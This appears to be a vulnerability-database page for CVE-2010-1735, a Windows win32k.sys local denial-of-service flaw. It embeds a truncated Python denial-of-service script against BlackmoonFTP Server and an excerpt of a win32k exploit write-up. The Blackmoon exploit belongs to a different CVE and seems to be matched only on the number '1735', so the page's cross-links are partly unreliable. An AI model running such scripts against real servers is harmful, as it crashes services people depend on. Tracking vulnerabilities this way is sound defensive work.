CVE-2010-1735
published 2010-05-06CVE-2010-1735: The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system…
PriorityP420medium4.9CVSS 2.0
AVLACLAuNCNINAC
EXPLOIT
EPSS
2.49%
82.7th percentile
The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_xp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
exploitdb·2011-01-13
CVE-2011-0507 Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
---
#!/usr/bin/python
# Exploit Title: BlackmoonFTP Server DOS
# Date: 12/28/2010
# Author: Craig Freyman (cd1zz)
# Software Link: http://www.mediafire.com/?bnc4d00myymmx55
# Version: 3.1 Release 6 - Build 1735 and 1736
# Tested On: Windows XP SP3
# Vendor Contacted: 12/28/2010
# Vendor Fixed: 1/13/2011
import socket
import sys
buffer = '\x41' * 600
counter = 1
if len(sys.argv) != 3:
print "Usage: ./blackmoonDOS.py "
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
while counter <= 300:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[*] Sending evil buffer. Count " + str(counter) + " out of 300"
s.connect((ip,int(port)))
s.recv(1024)
s.send('PORT ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT \r\n')
s.recv(1024
Exploit-DB
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
exploitdb·2010-04-22
CVE-2010-1894 Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
---
/*
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability
Effect : Microsoft Windows 2000/XP/2003 full patch
Author:MJ0011
Published: 2010-04-22
Vulnerability Details:
Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some
Message, will call gapfnScSendMessage this function table function to process, which under the deal 2000/xp/2003
0x4c No. message, there will be a function called SfnLOGONNOTIFY, this function again when the wParam == 4/13/12
When the data directly from the lParam inside out, despite the use of the function of the SEH, but as long as the kernel passes the wrong address, will still le
No writeups or analysis indexed.
http://secunia.com/advisories/39456http://vigilance.fr/vulnerability/Windows-denials-of-service-of-win32k-sys-9607http://www.securityfocus.com/archive/1/510884/100/0/threadedhttp://www.securityfocus.com/bid/39630http://secunia.com/advisories/39456http://vigilance.fr/vulnerability/Windows-denials-of-service-of-win32k-sys-9607http://www.securityfocus.com/archive/1/510884/100/0/threadedhttp://www.securityfocus.com/bid/39630
2010-05-06
Published